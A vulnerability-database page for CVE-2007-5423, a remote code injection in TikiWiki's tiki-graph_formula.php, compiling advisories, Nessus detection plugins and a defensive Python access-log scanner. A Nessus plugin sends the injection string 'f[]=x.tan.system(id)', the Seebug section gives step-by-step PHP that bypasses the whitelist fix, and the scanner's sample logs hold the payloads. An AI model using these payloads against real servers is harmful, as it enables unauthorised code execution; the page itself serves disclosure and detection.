CVE-2007-5423 - Code Injection vulnerability in Tiki Tikiwiki Cms/Groupware 1.9.8

CVSS 7.5 - HIGH

  • Attack vector: NETWORK
  • Attack complexity: LOW
  • Privileges required: NONE
  • Confidentiality impact: PARTIAL
  • Integrity impact: PARTIAL
  • Availability impact: PARTIAL

Tags: network, low complexity, tiki, CWE-94, nessus, exploit available, metasploit

Summary

tiki-graph_formula.php in TikiWiki 1.9.8 allows remote attackers to execute arbitrary code via PHP sequences in the f array parameter, which are processed by create_function.

Vulnerable Configurations

Part         Description  Count
Application  Tiki         1

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Leverage Executable Code in Non-Executable Files
    An attack of this type exploits a system's trust in configuration and resource files. When the executable loads a resource (such as an image file or configuration file) that the attacker has modified, the file either executes malicious code directly or manipulates the target process (e.g. an application server) into acting on the malicious configuration parameters. Because systems are increasingly interrelated, mashing up resources from local and remote sources, the possibility of this attack occurring is high. The attack can be directed at a client system, for example by causing a buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028, where specially crafted JPEG files could cause a buffer overrun once loaded into the browser. Another example targets clients reading PDF files. In this case the attacker simply appends JavaScript to the end of a legitimate URL for a PDF (http://www.gnucitizen.org/blog/danger-danger-danger/): http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here The client assumes that they are reading a PDF, but the attacker has modified the resource and loaded executable JavaScript into the client's browser process. The attack can also target server processes. The attacker edits a resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server; adding the role name "public" grants all users with the public role the ability to use the administration functionality. The server trusts its configuration file to be correct, but when it is manipulated, the attacker gains full control.
  • Manipulating User-Controlled Variables
    This attack targets user-controlled variables (DEBUG=1, PHP globals, and so forth). An attacker can override environment variables by leveraging user-supplied, untrusted query variables that are used directly on the application server without any data sanitization. In extreme cases, the attacker can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.

Exploit-Db

  • description: TikiWiki tiki-graph_formula Remote PHP Code Execution. CVE-2007-5423. Webapps exploit for php platform
    id: EDB-ID:16911
    last seen: 2016-02-02
    modified: 2010-09-20
    published: 2010-09-20
    reporter: metasploit
    source: https://www.exploit-db.com/download/16911/
    title: TikiWiki tiki-graph_formula Remote PHP Code Execution
  • description: TikiWiki 1.9.8 Remote PHP Injection Vulnerability. CVE-2007-5423. Webapps exploit for php platform
    file: exploits/php/webapps/4509.txt
    id: EDB-ID:4509
    last seen: 2016-01-31
    modified: 2007-10-10
    platform: php
    port:
    published: 2007-10-10
    reporter: ShAnKaR
    source: https://www.exploit-db.com/download/4509/
    title: TikiWiki 1.9.8 - Remote PHP Injection Vulnerability
    type: webapps

Metasploit

description: TikiWiki (<= 1.9.8) contains a flaw that may allow a remote attacker to execute arbitrary PHP code. The issue is due to 'tiki-graph_formula.php' script not properly sanitizing user input supplied to create_function(), which may allow a remote attacker to execute arbitrary PHP code resulting in a loss of integrity.
id: MSF:EXPLOIT/UNIX/WEBAPP/TIKIWIKI_GRAPH_FORMULA_EXEC
last seen: 2020-03-10
modified: 2017-07-24
published: 2009-07-21
references: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5423
reporter: Rapid7
source: https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb
title: TikiWiki tiki-graph_formula Remote PHP Code Execution

Nessus

  • NASL family: Gentoo Local Security Checks
    NASL id: GENTOO_GLSA-200710-21.NASL
    description: The remote host is affected by the vulnerability described in GLSA-200710-21 (TikiWiki: Arbitrary command execution) ShAnKaR reported that input passed to the
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 27553
    published: 2007-10-25
    reporter: This script is Copyright (C) 2007-2019 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/27553
    title: GLSA-200710-21 : TikiWiki: Arbitrary command execution
    code:
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from Gentoo Linux Security Advisory GLSA 200710-21.
    #
    # The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.
    # and licensed under the Creative Commons - Attribution / Share Alike 
    # license. See http://creativecommons.org/licenses/by-sa/3.0/
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(27553);
      script_version("1.15");
      script_cvs_date("Date: 2019/08/02 13:32:44");
    
      script_cve_id("CVE-2007-5423");
      script_xref(name:"GLSA", value:"200710-21");
    
      script_name(english:"GLSA-200710-21 : TikiWiki: Arbitrary command execution");
      script_summary(english:"Checks for updated package(s) in /var/db/pkg");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:
    "The remote Gentoo host is missing one or more security-related
    patches."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "The remote host is affected by the vulnerability described in GLSA-200710-21
    (TikiWiki: Arbitrary command execution)
    
        ShAnKaR reported that input passed to the 'f' array parameter in
        tiki-graph_formula.php is not properly verified before being used to
        execute PHP functions.
      
    Impact :
    
        An attacker could execute arbitrary code with the rights of the user
        running the web server by passing a specially crafted parameter string
        to the tiki-graph_formula.php file.
      
    Workaround :
    
        There is no known workaround at this time."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://security.gentoo.org/glsa/200710-21"
      );
      script_set_attribute(
        attribute:"solution", 
        value:
    "All TikiWiki users should upgrade to the latest version:
        # emerge --sync
        # emerge --ask --oneshot --verbose '>=www-apps/tikiwiki-1.9.8.1'"
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
      script_set_attribute(attribute:"metasploit_name", value:'TikiWiki tiki-graph_formula Remote PHP Code Execution');
      script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
      script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
      script_set_attribute(attribute:"canvas_package", value:'CANVAS');
      script_cwe_id(94);
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:tikiwiki");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2007/10/20");
      script_set_attribute(attribute:"plugin_publication_date", value:"2007/10/25");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2007-2019 Tenable Network Security, Inc.");
      script_family(english:"Gentoo Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("qpkg.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo");
    if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    
    if (qpkg_check(package:"www-apps/tikiwiki", unaffected:make_list("ge 1.9.8.1"), vulnerable:make_list("lt 1.9.8.1"))) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());
      else security_hole(0);
      exit(0);
    }
    else
    {
      tested = qpkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "TikiWiki");
    }
    
  • NASL family: Gentoo Local Security Checks
    NASL id: GENTOO_GLSA-200711-19.NASL
    description: The remote host is affected by the vulnerability described in GLSA-200711-19 (TikiWiki: Multiple vulnerabilities) Stefan Esser reported that a previous vulnerability (CVE-2007-5423, GLSA 200710-21) was not properly fixed in TikiWiki 1.9.8.1 (CVE-2007-5682). The TikiWiki development team also added several checks to avoid file inclusion. Impact : A remote attacker could exploit these vulnerabilities to inject arbitrary code with the privileges of the user running the application. Workaround : There is no known workaround at this time.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 28219
    published: 2007-11-15
    reporter: This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/28219
    title: GLSA-200711-19 : TikiWiki: Multiple vulnerabilities
    code:
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from Gentoo Linux Security Advisory GLSA 200711-19.
    #
    # The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.
    # and licensed under the Creative Commons - Attribution / Share Alike 
    # license. See http://creativecommons.org/licenses/by-sa/3.0/
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(28219);
      script_version("1.17");
      script_cvs_date("Date: 2019/08/02 13:32:44");
    
      script_cve_id("CVE-2007-5423", "CVE-2007-5682");
      script_xref(name:"GLSA", value:"200711-19");
    
      script_name(english:"GLSA-200711-19 : TikiWiki: Multiple vulnerabilities");
      script_summary(english:"Checks for updated package(s) in /var/db/pkg");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:
    "The remote Gentoo host is missing one or more security-related
    patches."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "The remote host is affected by the vulnerability described in GLSA-200711-19
    (TikiWiki: Multiple vulnerabilities)
    
        Stefan Esser reported that a previous vulnerability (CVE-2007-5423,
        GLSA 200710-21) was not properly fixed in TikiWiki 1.9.8.1
        (CVE-2007-5682). The TikiWiki development team also added several
        checks to avoid file inclusion.
      
    Impact :
    
        A remote attacker could exploit these vulnerabilities to inject
        arbitrary code with the privileges of the user running the application.
      
    Workaround :
    
        There is no known workaround at this time."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://security.gentoo.org/glsa/200710-21"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://security.gentoo.org/glsa/200711-19"
      );
      script_set_attribute(
        attribute:"solution", 
        value:
    "All TikiWiki users should upgrade to the latest version:
        # emerge --sync
        # emerge --ask --oneshot --verbose '>=www-apps/tikiwiki-1.9.8.3'"
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
      script_set_attribute(attribute:"metasploit_name", value:'TikiWiki tiki-graph_formula Remote PHP Code Execution');
      script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
      script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
      script_set_attribute(attribute:"canvas_package", value:'CANVAS');
      script_cwe_id(94, 264);
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:tikiwiki");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2007/11/14");
      script_set_attribute(attribute:"plugin_publication_date", value:"2007/11/15");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Gentoo Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("qpkg.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo");
    if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    
    if (qpkg_check(package:"www-apps/tikiwiki", unaffected:make_list("ge 1.9.8.3"), vulnerable:make_list("lt 1.9.8.3"))) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());
      else security_hole(0);
      exit(0);
    }
    else
    {
      tested = qpkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "TikiWiki");
    }
    
  • NASL family: CGI abuses
    NASL id: TIKIWIKI_F_CMD_EXEC.NASL
    description: The remote host is running TikiWiki, an open source wiki application written in PHP. The version of TikiWiki on the remote host fails to sanitize input to the
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 26968
    published: 2007-10-11
    reporter: This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/26968
    title: TikiWiki tiki-graph_formula.php f Parameter Arbitrary Command Execution
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(26968);
      script_version("1.24");
      script_cvs_date("Date: 2018/11/15 20:50:19");
    
      script_cve_id("CVE-2007-5423");
      script_bugtraq_id(26006);
    
      script_name(english:"TikiWiki tiki-graph_formula.php f Parameter Arbitrary Command Execution");
      script_summary(english:"Tries to run a command via TikiWiki's tiki-graph_formula.php");
    
     script_set_attribute(attribute:"synopsis", value:
    "The remote web server contains a PHP script that allows arbitrary
    command execution." );
     script_set_attribute(attribute:"description", value:
    "The remote host is running TikiWiki, an open source wiki application
    written in PHP.
    
    The version of TikiWiki on the remote host fails to sanitize input to
    the 'f[]' parameter of the 'tiki-graph_formula.php' script before
    using it as a function call.  Regardless of PHP's 'register_globals'
    setting, an unauthenticated attacker can leverage this issue to
    execute arbitrary code on the remote host subject to the privileges of
    the web server user id." );
     script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/482006/30/0/threaded");
     script_set_attribute(attribute:"see_also", value:"https://tiki.org/tiki-read_article.php?articleId=14" );
     script_set_attribute(attribute:"solution", value:"Upgrade to TikiWiki version 1.9.8.1 or later.");
     script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
     script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
     script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
     script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
     script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
     script_set_attribute(attribute:"exploit_available", value:"false");
     script_set_attribute(attribute:"exploit_framework_core", value:"true");
     script_set_attribute(attribute:"metasploit_name", value:'TikiWiki tiki-graph_formula Remote PHP Code Execution');
     script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
     script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
     script_set_attribute(attribute:"canvas_package", value:'CANVAS');
     script_cwe_id(94);
    
     script_set_attribute(attribute:"plugin_publication_date", value:"2007/10/11");
    
    script_set_attribute(attribute:"plugin_type", value:"remote");
    script_set_attribute(attribute:"cpe", value:"cpe:/a:tikiwiki:tikiwiki");
    script_set_attribute(attribute:"exploited_by_nessus", value:"true");
      script_end_attributes();
    
    
      script_category(ACT_ATTACK);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("tikiwiki_detect.nasl");
      script_exclude_keys("Settings/disable_cgi_scanning");
      script_require_ports("Services/www", 80);
      script_require_keys("www/PHP","www/tikiwiki");
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("webapp_func.inc");
    include("data_protection.inc");
    
    port = get_http_port(default:80,php:TRUE);
    
    install = get_install_from_kb(appname:'tikiwiki', port:port, exit_on_fail:TRUE);
    dir = install['dir'];
    
    # Try to exploit the issue to run a command.
    cmd = "id";
    
    if (thorough_tests) ts = make_list("pdf", "png");
    else ts = make_list("pdf");
    
    foreach t (ts)
    {
      w = http_send_recv3(method:"GET",
          item:string(
            dir , "/tiki-graph_formula.php?",
            "w=1&",
            "h=1&",
            "s=1&",
            "min=1&",
            "max=2&",
            "f[]=x.tan.system(", cmd, ")&",
            "t=", t, "&",
            "title="
          ),
          port:port
        );
      if (isnull(w)) exit(1, "the web server did not answer");
      res = w[2];
    
      line = egrep(pattern:"uid=[0-9]+.*gid=[0-9]+.*", string:res);
      if (line)
      {
        report = string(
          "\n",
          "It was possible to execute the command '", cmd, "' on the remote host,\n",
          "which produces the following output :\n",
          "\n",
          "  ", data_protection::sanitize_uid(output:line)
          );
       security_hole(port:port, extra:report);
       exit(0);
      }
    }
    

Packetstorm

data source: https://packetstormsecurity.com/files/download/82370/tikiwiki_graph_formula_exec.rb.txt
id: PACKETSTORM:82370
last seen: 2016-12-05
published: 2009-10-30
reporter: Matteo Cantoni
source: https://packetstormsecurity.com/files/82370/TikiWiki-tiki-graph_formula-Remote-Command-Execution.html
title: TikiWiki tiki-graph_formula Remote Command Execution

Seebug

bulletinFamily: exploit
description: TikiWiki is a content management system / portal / groupware system built on PHP, ADOdb and Smarty.

The tiki-graph_formula.php script shipped with TikiWiki does not properly filter user-supplied parameters. A remote attacker can exploit the flaw to inject malicious PHP code and execute it with the privileges of the web server.

The tiki-graph_formula.php script uses PHP's create_function() to create anonymous functions that dynamically evaluate mathematical functions supplied by the user through the 'f' URL parameter.

To protect against execution of arbitrary PHP code, the TikiWiki developers combined a blacklist and a whitelist. On the one hand they blacklist three characters; on the other hand only certain alphanumeric strings are allowed in the user-supplied input.

The three blacklisted characters are:

    ` - allows execution of shell commands
    ' - string delimiter
    " - string delimiter

The whitelist of alphanumeric strings allows only the names of certain mathematical functions, such as sin, cos, tan, pow, ...

When ShAnKaR audited TikiWiki, the whitelist check was implemented incorrectly, which made it possible to execute PHP functions. This vulnerability was published as CVE-2007-5423 and patched in the TikiWiki 1.9.8.1 update.

However, because PHP supports variable functions and variable variables, the patched whitelist does not protect against arbitrary PHP code execution:

    $varname = 'othervar';
    $$varname = 4;   // set $othervar to 4
    $funcname = 'chr';
    $funcname(95);   // call chr(95)

Because TikiWiki's blacklist does not cover the '$' character, an injected PHP expression can use temporary variables such as $sin, $cos, $tan, ... It is therefore clear that the protection can be bypassed by filling these temporary variables with strings that name other functions.

Getting strings into the temporary variables looks difficult, because all of the allowed functions return only numbers, but two further PHP features help with this: array-to-string conversion and the handling of unknown constants:

    $sin=cosh;       // cosh is an unknown constant.
                     // PHP assumes the string 'cosh' as value
    $sin[]=pi();     // Creates an array
    $sin=$sin.$sin;  // Stringconcats of arrays. Array to string
                     // conversion. Becomes 'ArrayArray'

Combining these methods with the ++ operator, which can also increment alphanumeric strings, makes it possible to call the chr() function as follows:

    $tan=pi()-pi();               // Get 0 into $tan
    $sin=cosh;                    // Get the string 'cosh' into $sin
    $min=$sin[$tan];              // Get 'c' into $min
    $tan++;                       // Get 1 into $tan
    $min.=$sin[$tan+$tan+$tan]    // Append 'h' to 'c'
    $min.=$sin[$tan];             // Append 'o' to 'ch'
    $min++;                       // Increment 'cho' to 'chp'
    $min++;                       // Increment 'chp' to 'chq'
    $min++;                       // Increment 'chq' to 'chr'
    $min($tan)                    // Call chr(1)

With access to the chr() function it is possible to build arbitrary strings and call any other function, which results in arbitrary PHP code execution.

Affected versions (TikiWiki Project TikiWiki): 1.9.8 1, 1.9.8, 1.9.7, 1.9.6, 1.9.5, 1.9.4, 1.9.3 2, 1.9.3 1, 1.9.2, 1.9.1 .1, 1.9.1, 1.9 -rc3.1, 1.9 -rc3, 1.9 -rc2, 1.9 -rc1

Upgrade (the same package is listed for each affected version): TikiWiki Project tikiwiki-1.9.8.2.tar.gz http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modtime=1193347915&big_mirror=1
id: SSV:2363
last seen: 2017-11-19
modified: 2007-10-31
published: 2007-10-31
reporter: Root
title: TikiWiki Tiki-Graph_Formula.PHP Whitelist Check Code Injection Vulnerability
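
The Seebug description above shows why a character blacklist plus a name whitelist could not contain input that reaches create_function(). As an added example (not code from TikiWiki or from any of the sources listed on this page), the sketch below applies a positive token allow-list to the f values of tiki-graph_formula.php requests in a web access log and reports anything that is not plain arithmetic in x. The function list, the log lines and the paths are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Assumption: only the function names the page mentions; extend this set
# from the deployed application's real list of math functions.
ALLOWED_FUNCS = {"sin", "cos", "tan", "pow"}
TOKEN = re.compile(
    r"(?P<num>\d+(?:\.\d+)?)|(?P<name>[A-Za-z_]\w*)|(?P<op>[-+*/(),])", re.ASCII)
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[0-9.]+"')

# Constructed access-log lines (documentation IP ranges, invented paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2007:13:55:36 +0000] "GET /tiki/tiki-graph_formula.php'
    '?w=300&h=200&s=1&min=-5&max=5&f[]=sin(x)*2&t=png&title=demo HTTP/1.1" 200 5120',
    '198.51.100.7 - - [11/Oct/2007:02:11:09 +0000] "GET /tiki/tiki-graph_formula.php'
    '?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.system(id)&t=pdf&title= HTTP/1.1" 200 312',
    '203.0.113.5 - - [01/Nov/2007:07:40:51 +0000] "GET /tiki/tiki-graph_formula.php'
    '?w=1&h=1&s=1&min=1&max=2&f%5B%5D=%24sin%3Dcosh&t=png&title= HTTP/1.1" 200 98',
    '192.0.2.10 - - [01/Nov/2007:07:41:02 +0000] "GET /tiki/tiki-index.php HTTP/1.1" 200 8100',
]


def formula_violations(expr):
    """List the reasons expr is not plain arithmetic in x.

    This is a vocabulary check (numbers, x, operators, allow-listed calls),
    not a full expression parser.
    """
    problems, pos, depth = [], 0, 0
    while pos < len(expr):
        if expr[pos].isspace():
            pos += 1
            continue
        m = TOKEN.match(expr, pos)
        if m is None:
            # Covers $, ., [, ], =, ;, quotes and backticks.
            problems.append(f"illegal character {expr[pos]!r}")
            pos += 1
            continue
        pos = m.end()
        name = m.group("name")
        if name is not None:
            is_call = expr[pos:].lstrip().startswith("(")
            if name == "x":
                if is_call:
                    problems.append("variable 'x' used as a function")
            elif name not in ALLOWED_FUNCS:
                problems.append(f"identifier {name!r} is not on the allow-list")
            elif not is_call:
                # A bare name is what PHP turned into a string constant.
                problems.append(f"function name {name!r} used without a call")
        elif m.group("op") == "(":
            depth += 1
        elif m.group("op") == ")":
            depth -= 1
            if depth < 0:
                problems.append("unbalanced ')'")
                depth = 0
    if depth:
        problems.append("unbalanced '('")
    return problems


def scan_access_log(lines):
    """Return one finding per suspicious f value sent to tiki-graph_formula.php."""
    findings = []
    for line in lines:
        m = REQUEST.search(line)
        if m is None:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/tiki-graph_formula.php"):
            continue
        # parse_qsl percent-decodes keys and values, so f%5B%5D is seen as f[].
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == "f" or key.startswith("f["):
                problems = formula_violations(value)
                if problems:
                    findings.append({"client": line.split()[0],
                                     "formula": value, "problems": problems})
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding["client"], repr(finding["formula"]), finding["problems"])
```
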